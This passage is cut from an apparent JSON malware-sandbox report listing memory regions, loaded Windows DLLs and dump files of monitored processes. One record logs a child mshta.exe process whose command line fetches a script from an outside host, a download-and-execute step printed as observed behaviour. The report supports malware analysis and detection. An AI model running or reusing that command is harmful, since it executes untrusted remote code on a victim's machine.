"region_type": "memory_mapped_file", "start_va": 32505856, "timestamp": "00:00:24.042", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000414-addr_0x00000000020c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_40", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 34340864, "type": "region", "version": 1 }, "end_va": 34603007, "entry_point": 0, "filename": null, "id": "region_414", "name": "private_0x00000000020c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34340864, "timestamp": "00:00:24.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1941766144, "type": "region", "version": 1 }, "end_va": 1941843967, "entry_point": 1941766144, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_415", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1941766144, "timestamp": "00:00:24.043", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000416-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_41", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_416", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:24.043", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000417-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_42", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_417", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:24.043", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "mShta http://doc2th.com/tin/foobaz.txt &AAAA\u0012\fC", "filename": "c:\\windows\\system32\\mshta.exe", "id": "proc_3", "image_name": "mshta.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000418-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_43", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_418", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:24.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_419", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:24.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_420", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:24.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2879487, "entry_point": 2818048, "filename": "\\Windows\\System32\\mshta.exe", "id": "region_421", "name": "mshta.exe", "norm_filename": "c:\\windows\\system32\\mshta.exe", "region_type": "memory_mapped_file", "start_va": 2818048, "timestamp": "00:00:24.499", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000422-addr_0x0000000000310000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_44", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_422", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_423", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_424", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_425", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000426-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_45", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_426", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000427-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_46", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_427", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:24.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000428-addr_0x00000000000f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_47", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_428", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:24.584", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_429", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:24.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_430", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:00:24.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_431", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_432", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_433", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_434", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_435", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_436", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_437", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:24.590", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000438-addr_0x0000000000590000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 5898239, "entry_point": 0, "filename": null, "id": "region_438", "name": "private_0x0000000000590000", "norm_filename": null, "region_type": "private_memory", "start_va": 5832704, "timestamp": "00:00:24.592", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000439-addr_0x0000000000410000-size_0x0000000000150000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_49", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1376256, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_439", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:24.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5992448, "start_va": 1662320640, "type": "region", "version": 1 }, "end_va": 1668313087, "entry_point": 1662320640, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_440", "name": "mshtml.dll", "norm_filename": "c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 1662320640, "timestamp": "00:00:25.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1997602816, "type": "region", "version": 1 }, "end_va": 1997623295, "entry_point": 1997602816, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_441", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1997602816, "timestamp": "00:00:25.949", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_442", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:00:25.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_443", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:00:25.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_444", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:00:25.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_445", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:25.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_446", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:25.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985765375, "entry_point": 1984495616, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_447", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:00:25.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1993277440, "type": "region", "version": 1 }, "end_va": 1994280959, "entry_point": 1993277440, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_448", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1993277440, "timestamp": "00:00:25.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1997668352, "type": "region", "version": 1 }, "end_va": 1998024703, "entry_point": 1997668352, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_449", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1997668352, "timestamp": "00:00:25.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1969291264, "type": "region", "version": 1 }, "end_va": 1971367935, "entry_point": 1969291264, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_450", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1969291264, "timestamp": "00:00:25.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_451", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:00:25.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1964113920, "type": "region", "version": 1 }, "end_va": 1965281279, "entry_point": 1964113920, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_452", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1964113920, "timestamp": "00:00:25.954", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1964048384, "type": "region", "version": 1 }, "end_va": 1964097535, "entry_point": 1964048384, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_453", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1964048384, "timestamp": "00:00:25.954", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1856634880, "type": "region", "version": 1 }, "end_va": 1856806911, "entry_point": 1856634880, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_454", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 1856634880, "timestamp": "00:00:25.955", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1952382976, "type": "region", "version": 1 }, "end_va": 1952419839, "entry_point": 1952382976, "filename": "\\Windows\\System32\\version.dll", "id": "region_455", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1952382976, "timestamp": "00:00:25.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 118784, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 905215, "entry_point": 786432, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_456", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 786432, "timestamp": "00:00:26.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 5079039, "entry_point": 0, "filename": null, "id": "region_457", "name": "pagefile_0x0000000000410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4259840, "timestamp": "00:00:26.004", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000458-addr_0x0000000000550000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_50", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 5636095, "entry_point": 0, "filename": null, "id": "region_458", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:00:26.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_460", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:26.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_461", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:26.007", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5898240, "type": "region", "version": 1 }, "end_va": 6950911, "entry_point": 0, "filename": null, "id": "region_462", "name": "pagefile_0x00000000005a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5898240, "timestamp": "00:00:26.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 19595263, "entry_point": 0, "filename": null, "id": "region_463", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:00:26.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_464", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:26.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_465", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:26.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 851968, "filename": "\\Windows\\System32\\en-US\\mshta.exe.mui", "id": "region_466", "name": "mshta.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mshta.exe.mui", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:00:26.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000467-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_51", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_467", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:26.017", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000468-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_52", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_468", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:26.017", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_469", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:26.196", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000470-addr_0x00000000013f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_53", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 20905984, "type": "region", "version": 1 }, "end_va": 21954559, "entry_point": 0, "filename": null, "id": "region_470", "name": "private_0x00000000013f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 20905984, "timestamp": 